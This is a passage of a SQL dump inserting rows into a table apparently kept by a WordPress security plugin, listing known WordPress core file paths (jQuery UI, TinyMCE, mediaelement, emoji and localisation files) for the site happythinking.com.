(5299, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/tabs.min.js', 'wp-includes/js/jquery/ui/tabs.min.js'),
(5300, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/tooltip.js', 'wp-includes/js/jquery/ui/tooltip.js'),
(5301, '/home/equipm11/public_html/happythinking.com/wp-includes/js/jquery/ui/tooltip.min.js', 'wp-includes/js/jquery/ui/tooltip.min.js'),
(5302, '/home/equipm11/public_html/happythinking.com/wp-includes/js/json2.js', 'wp-includes/js/json2.js'),
(5303, '/home/equipm11/public_html/happythinking.com/wp-includes/js/json2.min.js', 'wp-includes/js/json2.min.js'),
(5304, '/home/equipm11/public_html/happythinking.com/wp-includes/js/masonry.min.js', 'wp-includes/js/masonry.min.js'),
(5305, '/home/equipm11/public_html/happythinking.com/wp-includes/js/mce-view.js', 'wp-includes/js/mce-view.js'),
(5306, '/home/equipm11/public_html/happythinking.com/wp-includes/js/mce-view.min.js', 'wp-includes/js/mce-view.min.js'),
(5307, '/home/equipm11/public_html/happythinking.com/wp-includes/js/media-audiovideo.js', 'wp-includes/js/media-audiovideo.js'),
(5308, '/home/equipm11/public_html/happythinking.com/wp-includes/js/media-audiovideo.min.js', 'wp-includes/js/media-audiovideo.min.js'),
(5309, '/home/equipm11/public_html/happythinking.com/wp-includes/js/media-editor.js', 'wp-includes/js/media-editor.js'),
(5310, '/home/equipm11/public_html/happythinking.com/wp-includes/js/media-editor.min.js', 'wp-includes/js/media-editor.min.js'),
(5311, '/home/equipm11/public_html/happythinking.com/wp-includes/js/media-grid.js', 'wp-includes/js/media-grid.js'),
(5312, '/home/equipm11/public_html/happythinking.com/wp-includes/js/media-grid.min.js', 'wp-includes/js/media-grid.min.js'),
(5313, '/home/equipm11/public_html/happythinking.com/wp-includes/js/media-models.js', 'wp-includes/js/media-models.js'),
(5314, '/home/equipm11/public_html/happythinking.com/wp-includes/js/media-models.min.js', 'wp-includes/js/media-models.min.js'),
(5315, '/home/equipm11/public_html/happythinking.com/wp-includes/js/media-views.js', 'wp-includes/js/media-views.js'),
(5316, '/home/equipm11/public_html/happythinking.com/wp-includes/js/media-views.min.js', 'wp-includes/js/media-views.min.js'),
(5317, '/home/equipm11/public_html/happythinking.com/wp-includes/js/mediaelement/mediaelement-and-player.js', 'wp-includes/js/mediaelement/mediaelement-and-player.js'),
(5318, '/home/equipm11/public_html/happythinking.com/wp-includes/js/mediaelement/mediaelement-and-player.min.js', 'wp-includes/js/mediaelement/mediaelement-and-player.min.js'),
(5319, '/home/equipm11/public_html/happythinking.com/wp-includes/js/mediaelement/mediaelement-migrate.js', 'wp-includes/js/mediaelement/mediaelement-migrate.js'),
(5320, '/home/equipm11/public_html/happythinking.com/wp-includes/js/mediaelement/mediaelement-migrate.min.js', 'wp-includes/js/mediaelement/mediaelement-migrate.min.js'),
(5321, '/home/equipm11/public_html/happythinking.com/wp-includes/js/mediaelement/mediaelement.js', 'wp-includes/js/mediaelement/mediaelement.js'),
(5322, '/home/equipm11/public_html/happythinking.com/wp-includes/js/mediaelement/mediaelement.min.js', 'wp-includes/js/mediaelement/mediaelement.min.js'),
(5323, '/home/equipm11/public_html/happythinking.com/wp-includes/js/mediaelement/mediaelementplayer-legacy.css', 'wp-includes/js/mediaelement/mediaelementplayer-legacy.css'),
(5324, '/home/equipm11/public_html/happythinking.com/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css', 'wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css'),
(5325, '/home/equipm11/public_html/happythinking.com/wp-includes/js/mediaelement/mediaelementplayer.css', 'wp-includes/js/mediaelement/mediaelementplayer.css'),
(5326, '/home/equipm11/public_html/happythinking.com/wp-includes/js/mediaelement/mediaelementplayer.min.css', 'wp-includes/js/mediaelement/mediaelementplayer.min.css'),
(5327, '/home/equipm11/public_html/happythinking.com/wp-includes/js/mediaelement/mejs-controls.png', 'wp-includes/js/mediaelement/mejs-controls.png'),
(5328, '/home/equipm11/public_html/happythinking.com/wp-includes/js/mediaelement/mejs-controls.svg', 'wp-includes/js/mediaelement/mejs-controls.svg'),
(5329, '/home/equipm11/public_html/happythinking.com/wp-includes/js/mediaelement/renderers/vimeo.js', 'wp-includes/js/mediaelement/renderers/vimeo.js'),
(5330, '/home/equipm11/public_html/happythinking.com/wp-includes/js/mediaelement/renderers/vimeo.min.js', 'wp-includes/js/mediaelement/renderers/vimeo.min.js'),
(5331, '/home/equipm11/public_html/happythinking.com/wp-includes/js/mediaelement/wp-mediaelement.css', 'wp-includes/js/mediaelement/wp-mediaelement.css'),
(5332, '/home/equipm11/public_html/happythinking.com/wp-includes/js/mediaelement/wp-mediaelement.js', 'wp-includes/js/mediaelement/wp-mediaelement.js'),
(5333, '/home/equipm11/public_html/happythinking.com/wp-includes/js/mediaelement/wp-mediaelement.min.css', 'wp-includes/js/mediaelement/wp-mediaelement.min.css'),
(5334, '/home/equipm11/public_html/happythinking.com/wp-includes/js/mediaelement/wp-mediaelement.min.js', 'wp-includes/js/mediaelement/wp-mediaelement.min.js'),
(5335, '/home/equipm11/public_html/happythinking.com/wp-includes/js/mediaelement/wp-playlist.js', 'wp-includes/js/mediaelement/wp-playlist.js'),
(5336, '/home/equipm11/public_html/happythinking.com/wp-includes/js/mediaelement/wp-playlist.min.js', 'wp-includes/js/mediaelement/wp-playlist.min.js'),
(5337, '/home/equipm11/public_html/happythinking.com/wp-includes/js/plupload/handlers.js', 'wp-includes/js/plupload/handlers.js'),
(5338, '/home/equipm11/public_html/happythinking.com/wp-includes/js/plupload/handlers.min.js', 'wp-includes/js/plupload/handlers.min.js'),
(5339, '/home/equipm11/public_html/happythinking.com/wp-includes/js/plupload/license.txt', 'wp-includes/js/plupload/license.txt'),
(5340, '/home/equipm11/public_html/happythinking.com/wp-includes/js/plupload/moxie.js', 'wp-includes/js/plupload/moxie.js'),
(5341, '/home/equipm11/public_html/happythinking.com/wp-includes/js/plupload/moxie.min.js', 'wp-includes/js/plupload/moxie.min.js'),
(5342, '/home/equipm11/public_html/happythinking.com/wp-includes/js/plupload/plupload.js', 'wp-includes/js/plupload/plupload.js'),
(5343, '/home/equipm11/public_html/happythinking.com/wp-includes/js/plupload/plupload.min.js', 'wp-includes/js/plupload/plupload.min.js'),
(5344, '/home/equipm11/public_html/happythinking.com/wp-includes/js/plupload/wp-plupload.js', 'wp-includes/js/plupload/wp-plupload.js'),
(5345, '/home/equipm11/public_html/happythinking.com/wp-includes/js/plupload/wp-plupload.min.js', 'wp-includes/js/plupload/wp-plupload.min.js'),
(5346, '/home/equipm11/public_html/happythinking.com/wp-includes/js/quicktags.js', 'wp-includes/js/quicktags.js'),
(5347, '/home/equipm11/public_html/happythinking.com/wp-includes/js/quicktags.min.js', 'wp-includes/js/quicktags.min.js'),
(5348, '/home/equipm11/public_html/happythinking.com/wp-includes/js/shortcode.js', 'wp-includes/js/shortcode.js'),
(5349, '/home/equipm11/public_html/happythinking.com/wp-includes/js/shortcode.min.js', 'wp-includes/js/shortcode.min.js'),
(5350, '/home/equipm11/public_html/happythinking.com/wp-includes/js/swfobject.js', 'wp-includes/js/swfobject.js'),
(5351, '/home/equipm11/public_html/happythinking.com/wp-includes/js/swfupload/handlers.js', 'wp-includes/js/swfupload/handlers.js'),
(5352, '/home/equipm11/public_html/happythinking.com/wp-includes/js/swfupload/handlers.min.js', 'wp-includes/js/swfupload/handlers.min.js'),
(5353, '/home/equipm11/public_html/happythinking.com/wp-includes/js/swfupload/license.txt', 'wp-includes/js/swfupload/license.txt'),
(5354, '/home/equipm11/public_html/happythinking.com/wp-includes/js/swfupload/swfupload.js', 'wp-includes/js/swfupload/swfupload.js'),
(5355, '/home/equipm11/public_html/happythinking.com/wp-includes/js/thickbox/loadingAnimation.gif', 'wp-includes/js/thickbox/loadingAnimation.gif'),
(5356, '/home/equipm11/public_html/happythinking.com/wp-includes/js/thickbox/macFFBgHack.png', 'wp-includes/js/thickbox/macFFBgHack.png'),
(5357, '/home/equipm11/public_html/happythinking.com/wp-includes/js/thickbox/thickbox.css', 'wp-includes/js/thickbox/thickbox.css'),
(5358, '/home/equipm11/public_html/happythinking.com/wp-includes/js/thickbox/thickbox.js', 'wp-includes/js/thickbox/thickbox.js'),
(5359, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/langs/wp-langs-en.js', 'wp-includes/js/tinymce/langs/wp-langs-en.js'),
(5360, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/license.txt', 'wp-includes/js/tinymce/license.txt'),
(5361, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/charmap/plugin.js', 'wp-includes/js/tinymce/plugins/charmap/plugin.js'),
(5362, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/charmap/plugin.min.js', 'wp-includes/js/tinymce/plugins/charmap/plugin.min.js'),
(5363, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/colorpicker/plugin.js', 'wp-includes/js/tinymce/plugins/colorpicker/plugin.js'),
(5364, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/colorpicker/plugin.min.js', 'wp-includes/js/tinymce/plugins/colorpicker/plugin.min.js'),
(5365, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/compat3x/css/dialog.css', 'wp-includes/js/tinymce/plugins/compat3x/css/dialog.css'),
(5366, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/compat3x/plugin.js', 'wp-includes/js/tinymce/plugins/compat3x/plugin.js'),
(5367, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/compat3x/plugin.min.js', 'wp-includes/js/tinymce/plugins/compat3x/plugin.min.js'),
(5368, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/directionality/plugin.js', 'wp-includes/js/tinymce/plugins/directionality/plugin.js'),
(5369, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/directionality/plugin.min.js', 'wp-includes/js/tinymce/plugins/directionality/plugin.min.js'),
(5370, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/fullscreen/plugin.js', 'wp-includes/js/tinymce/plugins/fullscreen/plugin.js'),
(5371, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/fullscreen/plugin.min.js', 'wp-includes/js/tinymce/plugins/fullscreen/plugin.min.js'),
(5372, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/hr/plugin.js', 'wp-includes/js/tinymce/plugins/hr/plugin.js');
INSERT INTO `wpou_wfknownfilelist` VALUES
(5373, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/hr/plugin.min.js', 'wp-includes/js/tinymce/plugins/hr/plugin.min.js'),
(5374, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/image/plugin.js', 'wp-includes/js/tinymce/plugins/image/plugin.js'),
(5375, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/image/plugin.min.js', 'wp-includes/js/tinymce/plugins/image/plugin.min.js'),
(5376, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/link/plugin.js', 'wp-includes/js/tinymce/plugins/link/plugin.js'),
(5377, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/link/plugin.min.js', 'wp-includes/js/tinymce/plugins/link/plugin.min.js'),
(5378, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/lists/plugin.js', 'wp-includes/js/tinymce/plugins/lists/plugin.js'),
(5379, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/lists/plugin.min.js', 'wp-includes/js/tinymce/plugins/lists/plugin.min.js'),
(5380, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/media/plugin.js', 'wp-includes/js/tinymce/plugins/media/plugin.js'),
(5381, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/media/plugin.min.js', 'wp-includes/js/tinymce/plugins/media/plugin.min.js'),
(5382, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/paste/plugin.js', 'wp-includes/js/tinymce/plugins/paste/plugin.js'),
(5383, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/paste/plugin.min.js', 'wp-includes/js/tinymce/plugins/paste/plugin.min.js'),
(5384, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/tabfocus/plugin.js', 'wp-includes/js/tinymce/plugins/tabfocus/plugin.js'),
(5385, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/tabfocus/plugin.min.js', 'wp-includes/js/tinymce/plugins/tabfocus/plugin.min.js'),
(5386, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/textcolor/plugin.js', 'wp-includes/js/tinymce/plugins/textcolor/plugin.js'),
(5387, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/textcolor/plugin.min.js', 'wp-includes/js/tinymce/plugins/textcolor/plugin.min.js'),
(5388, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/wordpress/plugin.js', 'wp-includes/js/tinymce/plugins/wordpress/plugin.js'),
(5389, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/wordpress/plugin.min.js', 'wp-includes/js/tinymce/plugins/wordpress/plugin.min.js'),
(5390, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/wpautoresize/plugin.js', 'wp-includes/js/tinymce/plugins/wpautoresize/plugin.js'),
(5391, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/wpautoresize/plugin.min.js', 'wp-includes/js/tinymce/plugins/wpautoresize/plugin.min.js'),
(5392, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/wpdialogs/plugin.js', 'wp-includes/js/tinymce/plugins/wpdialogs/plugin.js'),
(5393, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/wpdialogs/plugin.min.js', 'wp-includes/js/tinymce/plugins/wpdialogs/plugin.min.js'),
(5394, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/wpeditimage/plugin.js', 'wp-includes/js/tinymce/plugins/wpeditimage/plugin.js'),
(5395, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/wpeditimage/plugin.min.js', 'wp-includes/js/tinymce/plugins/wpeditimage/plugin.min.js'),
(5396, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/wpemoji/plugin.js', 'wp-includes/js/tinymce/plugins/wpemoji/plugin.js'),
(5397, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/wpemoji/plugin.min.js', 'wp-includes/js/tinymce/plugins/wpemoji/plugin.min.js'),
(5398, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/wpgallery/plugin.js', 'wp-includes/js/tinymce/plugins/wpgallery/plugin.js'),
(5399, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/wpgallery/plugin.min.js', 'wp-includes/js/tinymce/plugins/wpgallery/plugin.min.js'),
(5400, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/wplink/plugin.js', 'wp-includes/js/tinymce/plugins/wplink/plugin.js'),
(5401, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/wplink/plugin.min.js', 'wp-includes/js/tinymce/plugins/wplink/plugin.min.js'),
(5402, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/wptextpattern/plugin.js', 'wp-includes/js/tinymce/plugins/wptextpattern/plugin.js'),
(5403, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/wptextpattern/plugin.min.js', 'wp-includes/js/tinymce/plugins/wptextpattern/plugin.min.js'),
(5404, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/wpview/plugin.js', 'wp-includes/js/tinymce/plugins/wpview/plugin.js'),
(5405, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/plugins/wpview/plugin.min.js', 'wp-includes/js/tinymce/plugins/wpview/plugin.min.js'),
(5406, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/skins/lightgray/content.inline.min.css', 'wp-includes/js/tinymce/skins/lightgray/content.inline.min.css'),
(5407, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/skins/lightgray/content.min.css', 'wp-includes/js/tinymce/skins/lightgray/content.min.css'),
(5408, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.eot', 'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.eot'),
(5409, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.svg', 'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.svg'),
(5410, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.ttf', 'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.ttf'),
(5411, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.woff', 'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.woff'),
(5412, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.eot', 'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.eot'),
(5413, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.svg', 'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.svg'),
(5414, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.ttf', 'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.ttf'),
(5415, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.woff', 'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.woff'),
(5416, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/skins/lightgray/img/anchor.gif', 'wp-includes/js/tinymce/skins/lightgray/img/anchor.gif'),
(5417, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/skins/lightgray/img/loader.gif', 'wp-includes/js/tinymce/skins/lightgray/img/loader.gif'),
(5418, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/skins/lightgray/img/object.gif', 'wp-includes/js/tinymce/skins/lightgray/img/object.gif'),
(5419, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/skins/lightgray/img/trans.gif', 'wp-includes/js/tinymce/skins/lightgray/img/trans.gif'),
(5420, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/skins/lightgray/skin.min.css', 'wp-includes/js/tinymce/skins/lightgray/skin.min.css'),
(5421, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/skins/wordpress/images/audio.png', 'wp-includes/js/tinymce/skins/wordpress/images/audio.png'),
(5422, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/skins/wordpress/images/dashicon-edit.png', 'wp-includes/js/tinymce/skins/wordpress/images/dashicon-edit.png'),
(5423, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/skins/wordpress/images/dashicon-no.png', 'wp-includes/js/tinymce/skins/wordpress/images/dashicon-no.png'),
(5424, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/skins/wordpress/images/embedded.png', 'wp-includes/js/tinymce/skins/wordpress/images/embedded.png'),
(5425, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/skins/wordpress/images/gallery-2x.png', 'wp-includes/js/tinymce/skins/wordpress/images/gallery-2x.png'),
(5426, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/skins/wordpress/images/gallery.png', 'wp-includes/js/tinymce/skins/wordpress/images/gallery.png'),
(5427, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/skins/wordpress/images/more-2x.png', 'wp-includes/js/tinymce/skins/wordpress/images/more-2x.png'),
(5428, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/skins/wordpress/images/more.png', 'wp-includes/js/tinymce/skins/wordpress/images/more.png'),
(5429, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/skins/wordpress/images/pagebreak-2x.png', 'wp-includes/js/tinymce/skins/wordpress/images/pagebreak-2x.png'),
(5430, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/skins/wordpress/images/pagebreak.png', 'wp-includes/js/tinymce/skins/wordpress/images/pagebreak.png'),
(5431, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/skins/wordpress/images/playlist-audio.png', 'wp-includes/js/tinymce/skins/wordpress/images/playlist-audio.png'),
(5432, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/skins/wordpress/images/playlist-video.png', 'wp-includes/js/tinymce/skins/wordpress/images/playlist-video.png'),
(5433, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/skins/wordpress/images/video.png', 'wp-includes/js/tinymce/skins/wordpress/images/video.png'),
(5434, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/skins/wordpress/wp-content.css', 'wp-includes/js/tinymce/skins/wordpress/wp-content.css'),
(5435, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/themes/inlite/theme.js', 'wp-includes/js/tinymce/themes/inlite/theme.js'),
(5436, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/themes/inlite/theme.min.js', 'wp-includes/js/tinymce/themes/inlite/theme.min.js'),
(5437, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/themes/modern/theme.js', 'wp-includes/js/tinymce/themes/modern/theme.js'),
(5438, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/themes/modern/theme.min.js', 'wp-includes/js/tinymce/themes/modern/theme.min.js'),
(5439, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/tiny_mce_popup.js', 'wp-includes/js/tinymce/tiny_mce_popup.js'),
(5440, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/tinymce.min.js', 'wp-includes/js/tinymce/tinymce.min.js'),
(5441, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/utils/editable_selects.js', 'wp-includes/js/tinymce/utils/editable_selects.js'),
(5442, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/utils/form_utils.js', 'wp-includes/js/tinymce/utils/form_utils.js'),
(5443, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/utils/mctabs.js', 'wp-includes/js/tinymce/utils/mctabs.js'),
(5444, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/utils/validate.js', 'wp-includes/js/tinymce/utils/validate.js'),
(5445, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/wp-tinymce.js', 'wp-includes/js/tinymce/wp-tinymce.js'),
(5446, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tinymce/wp-tinymce.php', 'wp-includes/js/tinymce/wp-tinymce.php'),
(5447, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tw-sack.js', 'wp-includes/js/tw-sack.js'),
(5448, '/home/equipm11/public_html/happythinking.com/wp-includes/js/tw-sack.min.js', 'wp-includes/js/tw-sack.min.js'),
(5449, '/home/equipm11/public_html/happythinking.com/wp-includes/js/twemoji.js', 'wp-includes/js/twemoji.js'),
(5450, '/home/equipm11/public_html/happythinking.com/wp-includes/js/twemoji.min.js', 'wp-includes/js/twemoji.min.js'),
(5451, '/home/equipm11/public_html/happythinking.com/wp-includes/js/underscore.js', 'wp-includes/js/underscore.js'),
(5452, '/home/equipm11/public_html/happythinking.com/wp-includes/js/underscore.min.js', 'wp-includes/js/underscore.min.js'),
(5453, '/home/equipm11/public_html/happythinking.com/wp-includes/js/utils.js', 'wp-includes/js/utils.js'),
(5454, '/home/equipm11/public_html/happythinking.com/wp-includes/js/utils.min.js', 'wp-includes/js/utils.min.js'),
(5455, '/home/equipm11/public_html/happythinking.com/wp-includes/js/wp-ajax-response.js', 'wp-includes/js/wp-ajax-response.js'),
(5456, '/home/equipm11/public_html/happythinking.com/wp-includes/js/wp-ajax-response.min.js', 'wp-includes/js/wp-ajax-response.min.js'),
(5457, '/home/equipm11/public_html/happythinking.com/wp-includes/js/wp-api.js', 'wp-includes/js/wp-api.js'),
(5458, '/home/equipm11/public_html/happythinking.com/wp-includes/js/wp-api.min.js', 'wp-includes/js/wp-api.min.js'),
(5459, '/home/equipm11/public_html/happythinking.com/wp-includes/js/wp-auth-check.js', 'wp-includes/js/wp-auth-check.js'),
(5460, '/home/equipm11/public_html/happythinking.com/wp-includes/js/wp-auth-check.min.js', 'wp-includes/js/wp-auth-check.min.js'),
(5461, '/home/equipm11/public_html/happythinking.com/wp-includes/js/wp-backbone.js', 'wp-includes/js/wp-backbone.js'),
(5462, '/home/equipm11/public_html/happythinking.com/wp-includes/js/wp-backbone.min.js', 'wp-includes/js/wp-backbone.min.js'),
(5463, '/home/equipm11/public_html/happythinking.com/wp-includes/js/wp-custom-header.js', 'wp-includes/js/wp-custom-header.js'),
(5464, '/home/equipm11/public_html/happythinking.com/wp-includes/js/wp-custom-header.min.js', 'wp-includes/js/wp-custom-header.min.js'),
(5465, '/home/equipm11/public_html/happythinking.com/wp-includes/js/wp-embed-template.js', 'wp-includes/js/wp-embed-template.js'),
(5466, '/home/equipm11/public_html/happythinking.com/wp-includes/js/wp-embed-template.min.js', 'wp-includes/js/wp-embed-template.min.js'),
(5467, '/home/equipm11/public_html/happythinking.com/wp-includes/js/wp-embed.js', 'wp-includes/js/wp-embed.js'),
(5468, '/home/equipm11/public_html/happythinking.com/wp-includes/js/wp-embed.min.js', 'wp-includes/js/wp-embed.min.js'),
(5469, '/home/equipm11/public_html/happythinking.com/wp-includes/js/wp-emoji-loader.js', 'wp-includes/js/wp-emoji-loader.js'),
(5470, '/home/equipm11/public_html/happythinking.com/wp-includes/js/wp-emoji-loader.min.js', 'wp-includes/js/wp-emoji-loader.min.js'),
(5471, '/home/equipm11/public_html/happythinking.com/wp-includes/js/wp-emoji-release.min.js', 'wp-includes/js/wp-emoji-release.min.js'),
(5472, '/home/equipm11/public_html/happythinking.com/wp-includes/js/wp-emoji.js', 'wp-includes/js/wp-emoji.js'),
(5473, '/home/equipm11/public_html/happythinking.com/wp-includes/js/wp-emoji.min.js', 'wp-includes/js/wp-emoji.min.js'),
(5474, '/home/equipm11/public_html/happythinking.com/wp-includes/js/wp-list-revisions.js', 'wp-includes/js/wp-list-revisions.js'),
(5475, '/home/equipm11/public_html/happythinking.com/wp-includes/js/wp-list-revisions.min.js', 'wp-includes/js/wp-list-revisions.min.js'),
(5476, '/home/equipm11/public_html/happythinking.com/wp-includes/js/wp-lists.js', 'wp-includes/js/wp-lists.js'),
(5477, '/home/equipm11/public_html/happythinking.com/wp-includes/js/wp-lists.min.js', 'wp-includes/js/wp-lists.min.js'),
(5478, '/home/equipm11/public_html/happythinking.com/wp-includes/js/wp-pointer.js', 'wp-includes/js/wp-pointer.js'),
(5479, '/home/equipm11/public_html/happythinking.com/wp-includes/js/wp-pointer.min.js', 'wp-includes/js/wp-pointer.min.js'),
(5480, '/home/equipm11/public_html/happythinking.com/wp-includes/js/wp-sanitize.js', 'wp-includes/js/wp-sanitize.js'),
(5481, '/home/equipm11/public_html/happythinking.com/wp-includes/js/wp-sanitize.min.js', 'wp-includes/js/wp-sanitize.min.js'),
(5482, '/home/equipm11/public_html/happythinking.com/wp-includes/js/wp-util.js', 'wp-includes/js/wp-util.js'),
(5483, '/home/equipm11/public_html/happythinking.com/wp-includes/js/wp-util.min.js', 'wp-includes/js/wp-util.min.js'),
(5484, '/home/equipm11/public_html/happythinking.com/wp-includes/js/wpdialog.js', 'wp-includes/js/wpdialog.js'),
(5485, '/home/equipm11/public_html/happythinking.com/wp-includes/js/wpdialog.min.js', 'wp-includes/js/wpdialog.min.js'),
(5486, '/home/equipm11/public_html/happythinking.com/wp-includes/js/wplink.js', 'wp-includes/js/wplink.js'),
(5487, '/home/equipm11/public_html/happythinking.com/wp-includes/js/wplink.min.js', 'wp-includes/js/wplink.min.js'),
(5488, '/home/equipm11/public_html/happythinking.com/wp-includes/js/zxcvbn-async.js', 'wp-includes/js/zxcvbn-async.js'),
(5489, '/home/equipm11/public_html/happythinking.com/wp-includes/js/zxcvbn-async.min.js', 'wp-includes/js/zxcvbn-async.min.js'),
(5490, '/home/equipm11/public_html/happythinking.com/wp-includes/js/zxcvbn.min.js', 'wp-includes/js/zxcvbn.min.js'),
(5491, '/home/equipm11/public_html/happythinking.com/wp-includes/kses.php', 'wp-includes/kses.php'),
(5492, '/home/equipm11/public_html/happythinking.com/wp-includes/l10n/class-wp-translation-controller.php', 'wp-includes/l10n/class-wp-translation-controller.php'),
(5493, '/home/equipm11/public_html/happythinking.com/wp-includes/l10n/class-wp-translation-file-mo.php', 'wp-includes/l10n/class-wp-translation-file-mo.php'),
(5494, '/home/equipm11/public_html/happythinking.com/wp-includes/l10n/class-wp-translation-file-php.php', 'wp-includes/l10n/class-wp-translation-file-php.php'),
(5495, '/home/equipm11/public_html/happythinking.com/wp-includes/l10n/class-wp-translation-file.php', 'wp-includes/l10n/class-wp-translation-file.php'),
(5496, '/home/equipm11/public_html/happythinking.com/wp-includes/l10n/class-wp-translations.php', 'wp-includes/l10n/class-wp-translations.php'),
(5497, '/home/equipm11/public_html/happythinking.com/wp-includes/l10n.php', 'wp-includes/l10n.php'),
